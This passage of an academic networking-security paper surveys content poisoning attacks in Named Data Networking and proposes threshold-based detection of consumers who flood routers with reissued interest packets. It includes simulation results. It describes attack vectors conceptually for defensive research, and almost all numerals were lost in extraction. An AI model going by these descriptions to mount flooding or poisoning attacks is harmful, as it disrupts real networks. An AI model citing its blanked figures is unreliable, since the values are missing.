user’s access pattern using this technique. the content type that is accessed and other related information will also be vulnerable to privacy. content poisoning attack one of the most crucial attack vectors in ndn is the content poisoning attack. in cpa, the attacker compromises the router, and this malicious router sends a reply to the legitimate request with totally bogus or corrupted content. the contents of intermediate routers that are involved in ndn communication are stored in cs. this poisoned content spreads when other legitimate consumers request the same content. content in ndn is of three types, that is, legit contents, fake or poisonous contents, and corrupted contents. a valid signature of valid content is generated through the private key of a legit publisher. similarly, a valid signature of fake content can also be generated with any private key that is not associated with the publisher’s namespace. whereas the corrupted content does not have a valid signature ullah et al. ( ). in a content poisoning attack, an attacker takes over a router and replies to incoming interests with corrupted content. wu et al. ( ) explained that if a consumer requests this corrupted content, it will spread this malicious content on intermediate routers’ content stores. it will result in the spreading of qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this poisonous content all over the network. this verification is usually performed by consumers who use the content verification process using the content’s signature. in ndn, every router can verify the arriving contents on its own, but this verification at line speed takes resources, and it is impractical. gasti et al. ( ) described two ways through which a content poisoning attack can be carried out. the first way is that the attacker compromises the routers, spreading the poisoned content while satisfying the requested interest packets. the second way is that poisoned content is distributed via compromised publishers. compromised publishers can anticipate the data that will be in high demand, for example, highlight a famous football match, and create malicious content. so in this way, a compromised producer or router can reply with a malicious data packet against a legitimate interest packet. cpa detection and mitigation approaches content poisoning attack can be detected and mitigated through two major approaches, collaborative signature verification, and the consumer dependent approach. the former method is those in which ndn routers collaborate to verify the content’s signature. the latter method uses extra fields in the interest and data packets or uses clients’ feedback. mitigation of cpa using consumer dependent approach as per ndn specification, a consumer verifies all the signatures of the requested data packets. so a feedback-based approach is used to verify the content at the router (gasti et al., ). this approach is the extended version of the nvf technique, as discussed in the previous section. however, this approach has some new challenges, such as there is no trust relationship between the router and the consumers. consumers can also be compromised, and in this way, false feedback can consume network resources. ghali, tsudik & uzun ( a) proposed a technique for content ranking calculation and stored in the exclude field of the interest packet, and the range of the values are between and . new content is ranked , which gets downgraded if rated by consumers and included in the excluded field of the consumer. this approach is somewhat similar to the technique mentioned in gasti et al. ( ), so it has the same limitations. ghali, tsudik & uzun ( b) highlighted some of the ndn architecture vulnerabilities, such as the ppkd field and name’s digest are not the essential components of the interest packet. also, no such trust model is adopted unanimously by the consumer’s applications to fetch the content’s hash securely. based on these vulnerabilities, a technique is proposed, which enables an ikb rule to ensure trust. according to this rule, the interest packet must include the producer’s (content publisher’s) public key. it is also implied that producers should also have the public key in the data packets’ keylocator field. its implication on the router is that it should calculate the hash of the public key of the content received and compare it with the ppkd field against its pit entry. upon mismatch, the content is discarded but otherwise verified. upon successful verification, content is forwarded and stored in the content store of that particular router. yue, li & pang ( ) stated that ikb qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implication for consumers is that it has to acquire and validate the content provider’s public key before initiating the interest packet for that specific data packet. trust model can be acquired using three approaches: public keys of the content provider should be installed in the client application, the second one is the universal key name service, and the third one is global search-based service. also, to reduce the core routers’ workload, the author has proposed that an interest key binding check on the data packet should be performed at the edge routers. in contrast, core routers should perform this check probabilistically. the cons of this approach are that it is assumed that verifying the router is trusted, but it can verify the bogus ikb to be correct if it is malicious. so this scheme lacks scalability and has overhead. dibenedetto & papadopoulos ( ) proposed an approach in which consumers, upon verification failure, send a report packet, which will act as feedback to the other entities of the ndn network. when consumers detect a poisoned content, a special interest packet is generated by the network stack, and the information regarding the poisoned content is stored in this special report packet. when the router receives this special interest packet, it acts as one of the two proposed mitigation options that the author proposed. one is immediate failover, and the second one is probe first. in the first approach, the malicious face is marked with a low priority value for the future. and in the probe first technique, the node, upon receiving the special interest packet known as report packet, stops forwarding the interest packets of the namespaces on which the attack is underway. also, that particular node informs their next-hop routers about this malicious namespace. nguyen et al. ( ) explained three vulnerabilities in ndn architecture; the first one is unregistered remote provider, then multicast forwarding and the last one is the best route forwarding. the first vulnerability is that the interest packet can be satisfied with any data packet received from any of the faces. therefore, a malicious producer can induce malicious content and satisfy it before it gets satisfied by the legit producer. in ndn, faces are registered in the fib table’s corresponding values, so while doing multicast forwarding, the interest packet is forwarded to all these faces. so, the malicious producers can satisfy the interest packet with its malicious content. a router ignores a similar interest packet in the best route forwarding with the same name and selectors but different nonce when received during the suppression interval of retransmission. the interest received after this interval shall be transferred via the next lowest possible cost; thus, an interest packet can be satisfied with a malicious producer’s poisoned contents. hu et al. ( ) proposed a comprehensive system to mitigate cpa, and this article is all about identifying security flaws and proposing a mitigation strategy to address this flaw in this system. in the following sections, this base system is elaborated in detail. this system is comprised of three phases. first is the route building phase, then there is a normal content retrieval phase, and the last one is the recovery phase in chase content poisoning. it is required that ndn routers should enable name-key-based forwarding to forward interest towards registered content sources, and to specify legitimate content sources, every route advertisement should be authenticated with a trust management system. if content poisoning occurs on intermediate routers, then a mechanism of qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ “multipath forwarding based inband probe” is performed. in this approach, an interest packet with an exclude filter (poisoned content) is reissued and forwarded via alternate paths. when this packet reaches a particular router, it enables cached contents’ on-demand signature verification. verification of cached content is performed between the malicious payload included in the interest packets’ exclude filter or in the data packet that is returned and gets matched with the reissued interest packet. there are two benefits of this approach; first, with multipath forwarding, there is a great chance that consumers will acquire the legitimate content while legitimate content can be restored on the intermediate router via alternative forwarding options. this way, poisoned contents will be purged, and for future requests, legitimate contents will be returned from the routers’ cache. thus it will increase the overall throughput of the network. comparisons of cpa mitigation approaches table is a summarized view of the cpa mitigation approaches, as discussed in previous sections: based on the analysis of existing techniques and work to detect and mitigate cpa, there is still a need to sort out some challenges while developing a cpa mitigation strategy (hu et al., ). energy management in routers is an important issue. gao, wang & he ( ) evaluated that cpa and caching issues can consume a considerable amount of routers’ energy, which can add instability to the whole system. in hu et al. ( ) have implemented a robust and efficient mechanism to mitigate the cpa. in table , we have identified vulnerabilities in content poisoning attack mitigation schemes discussed in table cpa detection and mitigation. references ndn node detection mitigation overhead gasti et al. ( ) consumer, router signature, ppkd sscic, dscic verification of random signatures ghali, tsudik & uzun ( a) consumer signature content ranking content ranking calculation ghali, tsudik & uzun ( b) router ppkd and signature interest key binding signature verification nam, kim & yeom ( ) router signature slru extension signature verification kim et al. ( ) router signature slru extension signature verification wu et al. ( ) consumer, router signature reputation based forwarding signature verification kim et al. ( ) router signature in case of cache-hit slru extension signature verification dibenedetto & papadopoulos ( ) consumer, router signature modified forwarding strategy complete bogus packet in reissued interest packet hu et al. ( ) consumer, router ppkd and signature name-key based forwarding and multipath forwarding based inband probe signature verification (hash matching is fast due to ppkd entry) qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ previous sections of this article. in the following section, we explore how these vulnerabilities can be exploited and a mitigation strategy is proposed, which is the main research area of this article. proposed approach introduction the name-key based forwarding and multipath forwarding based inband probe is a very comprehensive scheme for mitigation of the cpa. it fills most of the attack surfaces regarding the content poisoning attack. however, with the advent of the ndn architecture’s structural changes, it has induced a new attack vector that can be exploited by the adversary. with this attack, the whole system can collapse. so it is very crucial to highlight this aspect. one of the important attack vectors that have emerged with this technique is the flooding of the reissued interest packet containing the excluded filter field. it is the leading research contribution of this article. a consumer with malicious intent can flood the network with interest containing the hash digest of legit or unpoisoned data in its exclude field, which can flood the network and enable multipath. it can harm the throughput of the network or even can cause ddos. based on the research gap mention in the previous section, this article has formulated the following research questions: what will be the mechanism to detect the attack initiated by consumers with malicious intent? what will be the parameters that will mitigate the malicious consumers’ reissued interest packet flooding attack? so it’s essential to mitigate and add this additional security feature in this cpa mitigation technique. detection of malicious consumer interest packet with excluded filter field during the cpa, the reissued interest packet by the consumer stores the hash of the poisoned data in the excluded filter field but a compromised consumer can also store the hash of and un-poisoned data has in the same field. consequently, it will result in a cache miss. the on-demand signature verification at the router will also be enabled during this process, consuming a lot of router processing power. when a consumer with malicious intent bombards these excluded interest packets, although they get discarded at the table vulnerabilities in cpa mitigation schemes (compromised consumers can flood routers). references checked by proposed solution energy efficient security features gasti et al. ( ) consumer and router sscic & dscic yes cannot detect corrupted content ghali, tsudik & uzun ( a) consumer content ranking algorithm no—overhead of calculating the content ratings do not handle malicious consumer in case it reports false content rating dibenedetto & papadopoulos ( ) first consumer and then router modifying forwarding strategy no—uses complete bogus packet in report only handles the malicious consumer identity but do not handle the corrupted data hu et al. ( ) first consumer and then router name-key based forwarding and multipath forwarding based inband probe yes—only use a ppkd extra field and use bogus/corrupted data hash in excluded filter field of interest packet can prevent poisoning of content by generating special interest packets qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ next router upon verification, it will drastically increase the router’s processing overhead. other legitimate consumers will face a denial of service from this router. this attack vector should be taken into account, and a mitigation strategy should be devised for such attacks. this way, the process of cpa mitigation will be severely affected. the block diagram of the flooding scenario is elaborated in fig. . the block diagram depicts the scenario of the flooding attack of interest packet with excluded filter. the first block shows that the consumer generates the normal interest packet. then a decision is taken in the next block that whether it is a normal interest packet or an interest packet with an excluded filter field. in case it is a normal interest packet, it is directed towards normal ndn operations; otherwise, it is passed to the next module of on-demand signature verification. here signature verification is performed against ppkd in the content store. if validation fails, this packet is discarded; otherwise, it gets purged from the router’s cs. in the case of poisoned data is found in the cs, the normal process is initiated, and content poisoning mitigation will commence. when a consumer is compromised, and it starts flooding the ndn network with the excluded filter enabled interest packet, it will trigger on-demand signature verification for each bogus packet, and the next ndn router will get saturated. the queue will be occupied, and after a while, there will be less space for the legitimate excluded filter interest packet. it will hamper the cpa mitigation mechanism badly. so this scenario is considered an attack and needs mitigation. figure detection of flooding attack during content poisoning attack mitigation. full-size doi: . /peerj-cs. /fig- qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mitigation of flooding attack in this article, a reactive approach is proposed to mitigate this attack. a virtual queue is utilized in ndn routers for incoming reissued interest packets from the consumers. fifo (fcfs) queue is shared among all the incoming faces for reissued interest packets. it is a temporary place holder for these packets until they get verified. the allotted memory for the transmitting packets should be different from the one used for caching. if the same cs is used to transmit packets and data chunk, then the cs will be congested with the data chunks that are waiting to be satisfied by the pending interest packets. to prevent the malicious consumer from sending a fake “excluded interest packet,” a satisfaction test is performed to check if the excluded interest packet is non-existent in the cache or a legit packet in the cache. in case a cache miss (of the excluded interest packet) occurs, and the ratio reaches near the threshold value, that is, it is set by the operator, it is considered an attack. on-demand verification at the router is not enabled unless there is a cache hit of the excluded interest packet; this will reduce the overhead of content verification at each data packet’s router. however, in case of a cache miss, this excluded interest packet is discarded. still, if a consumer with malicious intent floods the edge router with the fake interest packet with the excludes filter, it will degrade that particular edge router’s performance. the ndn-router service manager at the ndn router, especially at the edge of the network in the consumer domain, maintains the stats and looks at them. the router will drop the future reissued interests coming from this face with the excluded data packet as it is considered a malicious consumer upon hitting the threshold value. it will be done temporarily and delisted at the discretion of the network operator. a new lightweight parameter is added in the cs data structure to retain the cache miss counter of invalid reissued interest packet with excluded filter field. this value is compared with the threshold value. the block diagram can show the birds-eye view of this proposed mechanism in fig. . we have introduced a block of the proposed approach. the reissued interest packet upon several caches misses, and hitting the specified threshold value will trigger an event and blocks this malicious face. on the next iteration, this reissued packet from the malicious consumer face will be blocked. in algorithm (fig. ) ppkd, contentname, nonce, incoming face, excluded filter field value, threshold value, and cache miss counter value is passed as an argument. at statement , the hash comparison is performed and if the result is a cache miss then the cache miss counter value gets incremented. if that value reaches the threshold value then the event to block that specific malicious incoming face gets triggered. in case the result is a cache hit then the normal ndn communication process will commence. dynamic threshold value this approach helps the network operators set up the threshold value automatically during the special interest packet flooding attack by a malicious consumer. this approach aims to select the threshold value in an automated fashion based on the statistical monitoring of buffer capacity and cache miss ratio. in this approach, a network management software continuously monitors the cache miss ratio and buffer capacity qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ when a special interest packet is initiated. when the cache miss ratio average over a while results in a buffer overflow, the threshold value is thrashed to half. this process continues unless the threshold value becomes . this mechanism is elaborated in algorithm (fig. ). at this stage, the incoming face causing the flooding attack will get blocked till the particular timeout. initth ¼ queuesize=verificationrate ( ) cache miss ratio ¼ cm=ðcm þ chÞ ( ) network management software will continuously monitor the cache_miss_ratio and buffer size of the queue. benefits of dynamic threshold values over static threshold values the mitigation of flooding attack of special interest packets works on two approaches, first one uses the static threshold values which is set by network operators during the router figure mitigation of flooding attack. full-size doi: . /peerj-cs. /fig- qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ initial configuration. the second approach is the dynamic approach, in which the threshold value is adjusted adaptively by monitoring the queue size and cache miss ratio value. experimental results simulation environment for proof of concept and to run this scenario, a custom-built ndn simulator is developed in c# language in visual studio . the network parameters used in simulation scenarios are mentioned in table . figure detection and mitigation of flooding attack of reissued interest packet. full-size doi: . /peerj-cs. /fig- qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network topology scenario : one malicious consumer in scenario , our simulations’ network topology consists of two routes from the consumer to the producer. two paths routes that are used in this scenario are - - - - - - and - - - - - ; these paths are between the consumer and a producer (spring et al., ). in this scenario, it is evident that consumers with malicious intent can flood the network with unwanted interest packets with excluded fields occupied by the non-malicious or legit payload. if not mitigated at the edge router, all the routers will enable the on-demand verification, and this way, router performance will degrade with time. this problem can be mitigated by enabling a mechanism at edge routers of ndn and setting a threshold value that if it hits this value, block that interface through which these malicious excluded interest packets are coming. this way, the rest of the network will be safe from acquiring this malicious packet from consumers, and ultimately the performance of the intermediate routers will not be degraded. so to handle this issue network manager at ndn edge figure dynamic threshold value. full-size doi: . /peerj-cs. /fig- table simulation parameters. parameter default value request rate interests/second/consumer (interest with exclude parameter) max queue length (experiment and experiment ) , (experiment and experiment ) verification of interest packet interest/second no. of malicious consumers (experiment and experiment ) (experiment and experiment ) threshold value x qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ router enables this mechanism in which malicious interest packet with exclude field is dropped in case of a cache miss, and upon hitting the threshold value, the interface from which these excluded interest packets are received is blocked and added to the delist data structure. the timeout to get out of this delist data structure is at the desecration of the network operator. scenario : two malicious consumers in scenario , our simulations’ network topology consists of two routes from two consumers (i.e., consumer and consumer ) of the same domain to the producer via router (edge router). the routes that are used in this scenario is - - - - - - and - - - - - ; these paths are between the consumer and a producer (spring et al., ). the main thing to note in this scenario is that consumer and consumer are in the same domain. router , the virtual queue for incoming reissued interests, is shared between these two consumers. the queuing mechanism used in this scenario is fifo. there are two consumers with malicious intent in this scenario and can flood the network with unwanted interest packets with excluded fields occupied by the non-malicious or legit payload. if not mitigated at the edge router, the virtual queues will be fully occupied for the legit reissued interest packet, and consequently, packets will drop. this problem can be mitigated by enabling a mechanism at edge routers of ndn and setting a threshold value that if it hits this value, block that interface through which these malicious excluded interest packets arrive. this way, the rest of the network will be safe from acquiring this malicious packet from consumers, and ultimately the performance of the intermediate routers will not be degraded. experiments and result experiment (scenario ): with no threshold values in this experiment as shown in fig. , we have calculated the cache miss ratio of the interest packet containing the exclude filter and compared it with the queue length. upon flooding the router with a fake interest packet, the verification process takes time, and figure flooding attack with no threshold value and with one malicious consumer. full-size doi: . /peerj-cs. /fig- qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ meanwhile, the queue of interest packets will start increasing. after every second, % fake packet will drop, and % will be added to the queue. initially, no threshold value is set. after some time, congestion at the router’s incoming interest packet queue will occur, resulting in a drop of other future packets at this router. experiment (scenario ): with threshold values in the second experiment as shown in fig. , our proposed scheme is enabled at the edge routers in network management software. after several cache misses and upon hitting the threshold value to according to the simulation settings, it will block the incoming face of the consumer, and further, no more interest packets will be received from this malicious consumer face. after hitting the specified threshold value, the face is blocked and fake packets begin to drop from the queue. at s the queue will be empty and the router is no more saturated. experiment (scenario ): with no threshold values in the third experiment as shown in fig. , consumer starts flooding the network with fake interest packets with the excluded filter; the queue will begin to saturate as the verification rate is slow as compared to the flooding rate. in the th second, consumer also starts to flood the network; consequently, the queue begins to saturate linearly. initially, no threshold value is set, and at the th-second congestion at the router’s incoming interest packet queue will occur which will result in a drop of other future packets at this router. experiment (scenario ): with threshold values in the fourth experiment as shown in fig. , our proposed scheme is enabled at the edge routers in network management software. upon cache miss threshold value reaches , it will block the incoming face of consumer after three failed verification at th second. further, no interest will be received from this malicious consumer face. at th second, figure flooding attack with threshold value and with one malicious consumer. full-size doi: . /peerj-cs. /fig- qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ malicious consumer starts to saturate the queue which will, and similarly, after three failed attempts, this face gets blocked as well, and queues start to thrashed after both of the malicious consumer faces are blocked. dynamic threshold value it is evident in the experiment that with the increase in the cache_miss_ratio, the queue size will increase because the flooding rate is greater than the verification rate. also, cache_miss has a penality on the processor of the router, which can increase the processing overhead. in the graph (fig. ), the initial threshold value is set to buffer size divided by the packet verification rate. at th second the queue is filled up to %. at this stage, the new packets will start to drop. here, the system should act prudently and reduce the threshold value to half of the current value, and if flooding continues threshold value is reduced to half as shown in fig. , and so on till the value is reduced to . at this stage, the incoming face is blocked as it is considered as an attack. the queue will not be saturated, and memory will be available for other interest packets to get processed. figure flooding attack with threshold value and with two malicious consumers. full-size doi: . /peerj-cs. /fig- figure flooding attack with no threshold value and with two malicious consumers. full-size doi: . /peerj-cs. /fig- qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ if the flooding attack continues, we will multiplicatively decrease the threshold value to another half. this mechanism will continue against that particular flooding malicious face until the threshold value reaches . at this stage, that particular face will be blocked and considered as a malicious face. the face will be blocked until the timeout, whose value will be at the network operator’s discretion. figure special interest packet flooding with dynamic threshold value. full-size doi: . /peerj-cs. /fig- figure special interest packet flooding without dynamic threshold value. full-size doi: . /peerj-cs. /fig- qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effectiveness and accuracy of proposed solution by comparing the throughput of the normal special interest packets the simulation scenario is depicted in table . in the first scenario, , malicious interest packets are bombarded by one compromised consumer. a total of , normal interest packets were also induced in the system by a legitimate consumer in the same domain. in this scenario, no threshold value is set. the maximum throughput of a particular face is bps. initially, the throughput of the normal interest packets was up to % of the total capacity which is the desired result. but in the subsequent seconds, the malicious packets entered the router. queue capacity started to saturate, the throughput of the normal interest packet will start to drop as the queue gets filled up with the bombarded malicious packets. the processing overhead also started to increase because of the cost of the cache-miss penalty and verification overhead. this scenario is depicted in fig. . in this second scenario, again , malicious interest packets are bombarded by one compromised consumer. a total of , normal interest packets were also induced in the system by a legitimate consumer in the same domain. in this scenario, our proposed solution is placed and activated inside the ndn router service manager. the maximum throughput of a particular face is bps. the throughput of the normal interest packets was up to % of the total capacity which is the desired result. but in the subsequent seconds, the malicious packets entered the router. queue capacity started to saturate, then the proposed solution gets activated and blocks the malicious face when the cache miss counter value reached the threshold value. then we can see that according to our simulation environment after rd-second malicious packets didn’t enter the router queue and throughput of the normal interest packet will start to raise and other factors like processing overhead and queue capacity ratio get into the normal working range. this scenario is depicted in fig. . a total of , malicious packets bombarded were detected and dropped successfully by our system. system accuracy proved to be %. also, , legitimate special interest packets were processed and no packet was dropped. comparison of throughput, queue capacity and processing overhead during the cpa special interest packet flooding attack and that of our proposed approach is summarized in table . table simulation parameters for effectiveness of proposed approach. parameter default value request rate interests/second/consumer (special interest packets) interest packet max queue length verification of interest packet interest/second number of malicious special interest packets , pkts number of normal special interest packets , pkts number of malicious consumers threshold value x qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure throughput of the normal special interest packets in flooding attack scenario. full-size doi: . /peerj-cs. /fig- figure throughput of the normal special interest packets in flooding attack scenario with proposed mitigation strategy. full-size doi: . /peerj-cs. /fig- table comparison of throughput, queue capacity and processing overhead during special interest packet flooding attack. category proposed approach dibenedetto & papadopoulos ( ) min throughput of normal interest packet % % max queue occupation % % reporting packet size lightweight (sha hash - bytes) heavyweight (complete packet) trust anchor yes yes max processing overhead % % compromised consumer detection yes yes bogus report packet detection yes partial qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effectiveness and efficacy of proposed solution by comparing the throughput of interest packets and queue capacity is elaborated in experiments as in figs. and which is summarized in table . it is evident from the experiments that during the special interest packet flooding attack, our proposed approach showed promising results in terms of throughput, queue capacity and processing overhead. conclusion and future direction the main contribution of this work is to devise a mechanism that identifies and prevents the compromised consumers from flooding the network with special interest packets that are generated during the mitigation process of the content poisoning attack. the compromised consumers place the hash of an un-poisoned content in the excluded filter field of the special interest packet which causes cache miss at the edge router. owing to the bombardment of these special interest packets, it will tremendously increase the processing overhead on the ndn router. the cost is in terms of cache-miss penalty and verification overhead. also, the queue capacity of the ndn router gets saturated. consequently, the legitimate requests from the other consumers get dropped or face a substantial amount of delays. we also observed the damaging effect of multiple malicious consumers flooding the edge router which was also well handled by using the proposed technique. after the implementation of our scheme in the network service manager at the ndn edge router, the malicious face will be blocked when the cache-miss ratio value reaches the specified threshold value. we also have made the threshold value dynamic by adjusting the initial threshold according to cache-miss ratio and queue capacity values. an improvement in this technique can be done by incorporating quality of service solutions in ndn routers. multiple virtual queues for special interest packets can be maintained in ndn routers to handle the flooding of these packets. different queuing disciplines and algorithms like adaptive virtual queue (avq), credit-based fair queuing, weighted fair queuing, quick fair queueing, and class-based queuing can be tested to augment our approach. also, traffic shaping and rate control mechanism can be used to hold back the malicious face. additional information and declarations funding the authors received no funding for this work. competing interests masood ur-rehman is an academic editor for peerj. author contributions � adnan mahmood qureshi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � nadeem anjum conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � rao naveed bin rais conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � masood ur-rehman performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � amir qayyum analyzed the data, authored or reviewed drafts of the paper, provided the logistics to perform experiments, and approved the final draft. data availability the following information was supplied regarding data availability: code is available at figshare: qureshi, adnan ( ): myndnsim.zip. figshare. software. doi . /m .figshare. .v . references ahlgren b, dannewitz c, imbrenda c, kutscher d, ohlman b. . a survey of information- centric networking. ieee communications magazine ( ): – doi . /mcom. . . benmoussa a, tahari aek, kerrache ca, lagraa n, lakas a, hussain r, ahmad f. . msidn: mitigation of sophisticated interest flooding-based ddos attacks in named data networking. future generation computer systems ( ): – doi . /j.future. . . . benmoussa a, tahari aek, lagaa n, lakas a, ahmad f, hussain r, kerrache ca, kurugollu f. . a novel congestion-aware interest flooding attacks detection mechanism in named data networking. in: th international conference on computer communication and networks (icccn), july– aug. , valencia, spain. – . dibenedetto s, papadopoulos c. . mitigating poisoned content with forwarding strategy. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee, – . gao m, wang k, he l. . probabilistic model checking and scheduling implementation of energy router system in energy internet for green cities. ieee transactions on industrial informatics ( ): – doi . /tii. . . gasti p, tsudik g, uzun e, zhang l. . dos & ddos in named-data networking. in: proceedings - international conference on computer communications and networks, icccn, nassau, bahamas. – . ghali c, tsudik g, uzun e. a. needle in a haystack: mitigating content poisoning in named-data networking. in: nddss symposium, february , san diego, ca, usa. ghali c, tsudik g, uzun e. b. network-layer trust in named-data networking. acm sigcomm computer communication review ( ): – doi . / . . hassanein h, zulkernine m. . a survey of security attacks in information centric networking. ieee communications surveys & tutorials ( ): – doi . /comst. . . qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://dx.doi.org/ . /m .figshare. .v https://dx.doi.org/ . /m .figshare. .v http://dx.doi.org/ . /mcom. . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /tii. . http://dx.doi.org/ . / . http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hu x, gong j, cheng g, zhang g, fan c. . mitigating content poisoning with name key based forwarding and multipath forwarding based in band probe for energy management in smart cities. ieee access : – . jacobson v, smetters dk, thornton jd, plass mf, briggs nh, braynard rl. . networking named content. in: proceedings of the th international conference on emerging networking experiments and technologies, conext ’ . new york: association for computing machinery, – . kim d, bi j, vasilakos a, yeom i. . security of cached content in ndn. ieee transactions on information forensics and security ( ): – doi . /tifs. . . kim d, nam s, bi j, yeom i. . efficient content verification in named data networking. in: proceedings of the nd acm conference on information-centric networking, acm-icn ’ . new york: association for computing machinery, – . kumar n, singh ak, aleem a, srivastava s. . security attacks in named data networking: a review and research directions. journal of computer science and technology ( ): – doi . /s - - - . nam s, kim d, yeom i. . content verification in named data networking. in: international conference on information networking (icoin). – . nguyen t, marchal x, doyen g, cholez t, cogranne r. . content poisoning in named data networking: comprehensive characterization of real deployment. in: ifip/ieee symposium on integrated network and service management (im). piscataway: ieee, – . qureshi am, anjum n. . detection of malicious consumer interest packet while mitigating content poisoning attack with name-key based forwarding and multipath forwarding based inband probe. in: international conference on uk-china emerging technologies (ucet). glasgow: university of glasgow, – . ribeiro i, rocha a, albuquerque c, guimarães f. . content pollution mitigation for content-centric networking. in: th international conference on the network of the future (nof), – november , búzios, rio de janeiro, brazil. – . spring n, mahajan r, wetherall d, anderson t. . measuring isp topologies with rocketfuel. ieee/acm transactions on networking ( ): – doi . /tnet. . . tarkoma s, ain m, visala k. . the publish/subscribe internet routing paradigm (psirp): designing the future internet architecture. in: tselentis g, ed. towards the future internet. amsterdam: ios press, – . tourani r, misra s, mick t, panwar g. . security, privacy, and access control in information-centric networking: a survey. ieee communications surveys tutorials ( ): – doi . /comst. . . ullah ss, ullah i, khattak h, khan ma, adnan m, hussain s, amin nu, khattak mak. . a lightweight identity-based signature scheme for mitigation of content poisoning attack in named data networking with internet of things. ieee access : – doi . /access. . . wang y, qi z, lei k, liu b, tian c. . preventing bad content dispersal in named data networking. in: proceedings of the acm turing th celebration conference - china, acm tur-c ’ . new york: association for computing machinery. wein jm, kloninger jj, nottingham mc, karger dr, lisiecki pa. . content delivery network (cdn) content server request handling mechanism with metadata framework support. us patent , , . available at https://patents.google.com/patent/us b /en. qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tifs. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tnet. . http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /access. . https://patents.google.com/patent/us b /en http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wu d, xu z, chen b, zhang y. . what if routers are malicious? mitigating content poisoning attack in ndn. in: ieee trustcom/bigdatase/ispa, – august , tianjin, china. piscataway: ieee, – . yue p, li r, pang b. . register before publishing with smart forwarding, mitigate content poisoning attack in icn. in: ieee international conference on parallel distributed processing with applications, big data cloud computing, sustainable computing communications, social computing networking. piscataway: ieee, – . zhang z, yu y, zhang h, newberry e, mastorakis s, li y, afanasyev a, zhang l. . an overview of security support in named data networking. ieee communications magazine ( ): – . qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. detection of malicious consumer interest packet with dynamic threshold values introduction related work proposed approach experimental results conclusion and future direction references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution 